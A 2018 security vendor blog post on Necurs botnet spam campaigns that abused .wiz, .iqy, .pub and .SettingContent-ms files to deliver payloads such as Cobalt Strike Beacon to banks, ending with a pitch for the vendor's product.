Barkly vs Malware
Barkly Research
Sep 2018

New Necurs Spam Campaign Targets Banks with Malicious .Wiz Files

wiz-file-malware

Photo by Chris Christian

The latest trick attackers are using to bypass security and fool users into downloading malware involves .wiz file attachments. Here's what you need to know.

It's been a summer of experimentation for attackers leveraging the Necurs botnet. In late May and early June, large waves of Necurs-distributed spam emails were spotted carrying malicious Excel Web Query (.iqy) files. These legitimate, deceptively simple files blew right past email filters and antivirus scanners on their way to infecting victims with a second-stage payload (the FlawedAmmyy RAT). 

In July, the criminal group TA505 leveraged Necurs to distribute PDFs with another newly-exploited legitimate file type inside — .SettingContent-ms files. Once again, the payload these legitimate files were abused to retrieve was the FlawedAmmyy RAT. 

With Microsoft and Adobe both taking action to neuter .SettingContent-ms file abuse, attackers turned back to .iqy files for campaigns distributing the Marap downloader in early August. They also experimented with hiding them inside PDFs and password-protected ZIP archives to continue bypassing filters. 

Later that month, however, Necurs campaigns were spotted carrying a third legitimate file type — Microsoft Publisher (.pub) files. After initially including the .pub files as standalone attachments, attackers soon began embedding them inside PDF attachments to try their luck that way, as well. 

Necurs-campaign-experimentation


Now with the summer winding down, Necurs attack campaigns and their experimentation with legitimate file types still appears to be heating up. Most recently, researchers @SettiDavide89@hexlax@James_inthe_box, and others have spotted spam emails distributing malicious Wizard (.wiz) files — files used by Microsoft programs such as Word to guide users through complex or repetitive tasks. 

What the new .wiz file campaigns look like

Among those tracking the .wiz file campaign were researchers at Trend Micro, who provided an example of what one of the spam emails looked like:

Necurs-WIZ-file-attachment

Email disguised as an invoice notification with malicious .wiz file attached. Source: Trend Micro

As with previous spam emails distributed via Necurs, the email itself is incredibly basic, with a subject line referring to an invoice and the simple body text "please find attached."

This is just one example. Necurs campaigns typically deploy a variety of different types of emails all based on a handful of basic templates. Specific subject lines and messages can vary, but they generally tend to refer to invoices, payment notifications, scans, sales requests, etc. If you're interested, we've collected a list of email subject lines and "lures" they've used, along with screenshots, here

The attached .wiz files open in Microsoft Word, and contain an embedded macro in charge of retrieving and executing the second stage payload — in this case, Cobalt Strike Beacon

necurs-wiz-file-enable-macros

The .wiz file attachment opens in Word. Enabling content triggers the execution of an embedded macro that retrieves and executes a second-stage payload.

Other similarities and differences from previous Necurs campaigns 

The use of Cobalt Strike's Beacon marks an interesting departure from previous Necurs campaigns. Beacon is the payload for Cobalt Strike, a penetration testing framework used by red teams. It establishes a connection between target and attacker-controlled machines and facilitates the remote execution of commands, laying the groundwork for a broad range of attack activities.

While Cobalt Strike was designed to help red teams conduct valid penetration testing exercises, it has a history of being abused for criminal activity — most notoriously by a hacking group that security experts began referring to as the Cobalt Group after they were found utilizing the tool in real attacks targeting financial institutions. 

Due to the manual work required to take advantage of a Cobalt Strike Beacon installation, however, the attack campaigns it gets (mis)used in tend to be small and highly targeted. Necurs campaigns, on the other hand, tend to be high-volume affairs. While many of this summer's Necurs campaigns do appear to be targeting financial institutions, in particular, they are still large enough for this to be a somewhat odd choice in payload. 

That said, the connection between this campaign and previous Necurs campaigns is clear. For one thing, the embedded macro used in this campaign bears significant similarities to the macro used in previous Necurs campaigns that utilized malicious Microsoft Publisher files.

Necurs-wiz-file-macro

The macro embedded in the .wiz file campaign distributing a Cobalt Strike Beacon payload.

Necurs-Publisher-file-macro

The macro embedded in Microsoft Publisher files used in previous Necurs campaigns.


In addition, the Cobalt Strike Beacon payload utilizes the same code signing certificate that was seen assigned to the FlawedAmmyy RAT payloads in previous Necurs campaigns. 

One potential theory regarding the use of Cobalt Strike is that this campaign may have been designed primarily as an initial test to validate the use of .wiz files in larger campaigns distributing other payloads further down the road. We'll be following events closely to see whether .wiz files become a regular go-to in attackers' rapidly expanding arsenal of legitimate file types they like to abuse or not. 

Barkly blocks malicious abuse of .wiz files

Barkly-vs-malicious-wiz-fileBarkly customers are protected from these attacks thanks to Barkly's ability to observe and block suspicious process patterns. Unlike the majority of antivirus solutions, which are limited to signature matching and static file analysis, Barkly can step back, see the big picture, and understand that Office applications being used to launch command interpreters and download something from the Internet constitutes suspicious activity that is better off blocked. 

In that way, Barkly serves as a crucial safety net, allowing admins to rest easy knowing their machines are protected even if end users (or AVs) get fooled by these otherwise legitimate file formats.

Want to see Barkly in action for yourself? Sign up to test it out.  

Want to stay up-to-date on this and other threats? Subscribe to the Barkly blog.

Barkly Research

Barkly Research

Barkly's malware research team is hard at work stopping new malware that sneaks past antivirus.

lock-white.png

Don't be the last to know about new attacks

Join a group of 7,000 IT and security pros who get clear, actionable takes on the latest malware and infosec news.

Subscribe

Comments

Stay informed!

Get the latest security news, tips, and trends straight to your inbox.

Stay informed!

Get the latest security news, tips, and trends straight to your inbox.